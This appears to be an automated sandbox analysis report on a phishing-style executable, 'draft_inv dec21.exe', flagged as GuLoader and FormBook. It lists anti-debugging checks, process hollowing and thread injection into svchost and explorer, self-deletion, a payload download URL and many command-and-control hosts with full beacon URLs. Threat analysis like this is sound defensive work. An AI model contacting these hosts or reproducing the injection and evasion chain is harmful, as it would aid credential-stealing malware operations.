Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBBC0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FBC2 mov eax, dword ptr fs:[00000030h] 8_2_1E92FBC2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h] 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h] 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h] 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934BC0 mov eax, dword ptr fs:[00000030h] 8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8D8BD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8D8BD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1BE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1BE7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8E5BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8E5BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984BE0 mov eax, dword ptr fs:[00000030h] 8_2_1E984BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7BF0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7BF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F1B0F mov eax, dword ptr fs:[00000030h] 8_2_1E8F1B0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F1B0F mov eax, dword ptr fs:[00000030h] 8_2_1E8F1B0F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93DB1B mov eax, dword ptr fs:[00000030h] 8_2_1E93DB1B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DEB1C mov eax, dword ptr fs:[00000030h] 8_2_1E8DEB1C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACB1E mov eax, dword ptr fs:[00000030h] 8_2_1E8ACB1E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0B10 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECB20 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h] 8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h] 8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93CB20 mov eax, dword ptr fs:[00000030h] 8_2_1E93CB20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93DB2A mov eax, dword ptr fs:[00000030h] 8_2_1E93DB2A
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBB5B mov esi, dword ptr fs:[00000030h] 8_2_1E8EBB5B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93FB45 mov eax, dword ptr fs:[00000030h] 8_2_1E93FB45
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BB40 mov ecx, dword ptr fs:[00000030h] 8_2_1E96BB40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BB40 mov eax, dword ptr fs:[00000030h] 8_2_1E96BB40
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E8F2EB0

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: zbcdidj04hd0ibmx.exe.10.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.244.144.199 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.250.120.206 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.98.5.234 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 50.118.200.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.23.172.127 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.237.47.210 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.29.140.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.61.153.97 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.2.194.128 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 203.170.80.250 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 164.155.212.139 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.82.227 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 510000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\draft_inv dec21.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Thread register set: target process: 4580 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 4580 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\draft_inv dec21.exe Process created: C:\Users\user\Desktop\draft_inv dec21.exe "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\draft_inv dec21.exe" Jump to behavior
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6757843283.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7072184726.0000000004BC0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6855474655.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6808498694.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7089428273.000000000D88C000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp Binary or memory string: !Program Manager~
Source: UserOOBEBroker.exe, 00000003.00000002.11085691972.000002278F231000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6834280107.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.7065030343.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6786279628.0000000001621000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6735006596.0000000001621000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000002.11096235785.0000000006241000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.6832530982.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.6733033915.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.6784451344.0000000000F39000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.7062661256.0000000000F39000.00000004.00000020.sdmp Binary or memory string: ProgmanS

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: draft_inv dec21.exe PID: 2748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1340, type: MEMORYSTR
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 531747 Sample: draft_inv dec21.exe Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 36 www.smartam6.xyz 2->36 38 www.recruitresumelibrary.com 2->38 40 45 other IPs or domains 2->40 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 64 12 other signatures 2->64 11 draft_inv dec21.exe 1 2->11         started        14 UserOOBEBroker.exe 2->14         started        signatures3 62 Tries to resolve many domain names, but no domain seems valid 38->62 process4 signatures5 76 Tries to detect Any.run 11->76 78 Hides threads from debuggers 11->78 16 draft_inv dec21.exe 6 11->16         started        process6 dnsIp7 34 statuswar.info 162.241.120.147, 443, 49790 UNIFIEDLAYER-AS-1US United States 16->34 48 Modifies the context of a thread in another process (thread injection) 16->48 50 Tries to detect Any.run 16->50 52 Maps a DLL or memory area into another process 16->52 54 3 other signatures 16->54 20 explorer.exe 16->20 injected signatures8 process9 dnsIp10 42 www.dubaicars.online 185.68.16.57, 49805, 49819, 80 UKRAINE-ASUA Ukraine 20->42 44 www.writingmomsobitwithmom.com 216.250.120.206, 49796, 80 ONEANDONE-ASBrauerstrasse48DE United States 20->44 46 17 other IPs or domains 20->46 32 C:\Users\user\...\zbcdidj04hd0ibmx.exe, PE32 20->32 dropped 66 System process connects to network (likely due to code injection or exploit) 20->66 68 Benign windows process drops PE files 20->68 25 svchost.exe 20->25         started        file11 signatures12 process13 signatures14 70 Self deletion via cmd delete 25->70 72 Modifies the context of a thread in another process (thread injection) 25->72 74 Maps a DLL or memory area into another process 25->74 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
35.244.144.199
 www.gdav130.xyz United States
15169 GOOGLEUS false
216.250.120.206
 www.writingmomsobitwithmom.com United States
8560 ONEANDONE-ASBrauerstrasse48DE true
34.117.168.233
 td-ccm-168-233.wixdns.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG true
3.64.163.50
 www.inklusion.online United States
16509 AMAZON-02US true
185.98.5.234
 www.avto-click.com Kazakhstan
200532 HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs true
44.227.76.166
 www.apps365.one United States
16509 AMAZON-02US true
50.118.200.120
 www.mariforum.com United States
18779 EGIHOSTINGUS true
185.68.16.57
 www.dubaicars.online Ukraine
200000 UKRAINE-ASUA true
154.23.172.127
 dczhd.com United States
174 COGENT-174US true
34.237.47.210
 previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false
199.59.242.153
 www.effective.store United States
395082 BODIS-NJUS true
66.29.140.185
 www.lopsrental.lease United States
19538 ADVANTAGECOMUS true
185.61.153.97
 dif-directory.xyz United Kingdom
22612 NAMECHEAP-NETUS true
81.2.194.128
 growebox.com Czech Republic
24806 INTERNET-CZKtis238403KtisCZ true
203.170.80.250
 www.mackthetruck.com Australia
38719 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU true
164.155.212.139
 www.ayudavida.com South Africa
26484 IKGUL-26484US true
162.241.120.147
 statuswar.info United States
46606 UNIFIEDLAYER-AS-1US true
34.102.136.180
 heyvecino.com United States
15169 GOOGLEUS false
104.21.82.227
 www.ozattaos.xyz United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com 34.237.47.210 true
td-ccm-168-233.wixdns.net 34.117.168.233 true
growebox.com 81.2.194.128 true
www.lopsrental.lease 66.29.140.185 true
dif-directory.xyz 185.61.153.97 true
www.mariforum.com 50.118.200.120 true
parkingpage.namecheap.com 198.54.117.217 true
www.inklusion.online 3.64.163.50 true
heyvecino.com 34.102.136.180 true
statuswar.info 162.241.120.147 true
www.mackthetruck.com 203.170.80.250 true
littlefishth.com 34.102.136.180 true
www.ayudavida.com 164.155.212.139 true
www.apps365.one 44.227.76.166 true
luxalbridi.com 34.102.136.180 true
www.writingmomsobitwithmom.com 216.250.120.206 true
www.ozattaos.xyz 104.21.82.227 true
www.avto-click.com 185.98.5.234 true
www.gdav130.xyz 35.244.144.199 true
dczhd.com 154.23.172.127 true
www.effective.store 199.59.242.153 true
www.dubaicars.online 185.68.16.57 true
www.receiptpor.xyz unknown unknown
www.3uwz9mpxk77g.biz unknown unknown
www.quickcoreohio.com unknown unknown
www.testwebsite0711.com unknown unknown
www.jobl.space unknown unknown
www.cmoigus.net unknown unknown
www.dczhd.com unknown unknown
www.talkingpoint.tours unknown unknown
www.fatima2021.com unknown unknown
www.littlefishth.com unknown unknown
www.recruitresumelibrary.com unknown unknown
www.abcjanitorialsolutions.com unknown unknown
www.growebox.com unknown unknown
www.braxtynmi.xyz unknown unknown
www.tvterradafarinha.com unknown unknown
www.yghdlhax.xyz unknown unknown
www.heyvecino.com unknown unknown
www.luxalbridi.com unknown unknown
www.photon4energy.com unknown unknown
www.csenmoga.com unknown unknown
www.dif-directory.xyz unknown unknown
www.smartam6.xyz unknown unknown
www.wordpresshostingblog.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.fatima2021.com/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 true
  • Avira URL Cloud: safe
 unknown
http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c true
  • Avira URL Cloud: phishing
 unknown
http://www.littlefishth.com/n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP false
  • Avira URL Cloud: safe
 unknown
http://www.growebox.com/n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr true
  • Avira URL Cloud: safe
 unknown
www.ayudavida.com/n8ds/ true
  • Avira URL Cloud: safe
 low
http://www.writingmomsobitwithmom.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK true
  • Avira URL Cloud: safe
 unknown
http://www.avto-click.com/n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr true
  • Avira URL Cloud: safe
 unknown
http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr true
  • Avira URL Cloud: phishing
 unknown
http://www.gdav130.xyz/n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 false
  • Avira URL Cloud: safe
 unknown
http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs true
  • Avira URL Cloud: phishing
 unknown
https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin true
  • Avira URL Cloud: safe
 unknown
http://www.luxalbridi.com/n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr false
  • Avira URL Cloud: safe
 unknown
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN true
  • Avira URL Cloud: safe
 unknown
http://www.heyvecino.com/n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p false
  • Avira URL Cloud: safe
 unknown
http://www.gdav130.xyz/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 false
  • Avira URL Cloud: safe
 unknown
http://www.lopsrental.lease/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 true
  • Avira URL Cloud: safe
 unknown
http://www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL true
  • Avira URL Cloud: safe
 unknown
http://www.apps365.one/n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p true
  • Avira URL Cloud: safe
 unknown
http://www.ozattaos.xyz/n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j true
  • Avira URL Cloud: safe
 unknown
http://www.mariforum.com/n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr true
  • Avira URL Cloud: safe
 unknown
http://www.dczhd.com/n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN true
  • Avira URL Cloud: safe
 unknown
http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN true
  • Avira URL Cloud: phishing
 unknown
http://www.quickcoreohio.com/n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr true
  • Avira URL Cloud: safe
 unknown
http://www.ayudavida.com/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 true
  • Avira URL Cloud: safe
 unknown
http://www.apps365.one/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr true
  • Avira URL Cloud: safe
 unknown
http://www.effective.store/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR true
  • Avira URL Cloud: safe
 unknown
http://www.inklusion.online/n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p true
  • Avira URL Cloud: safe
 unknown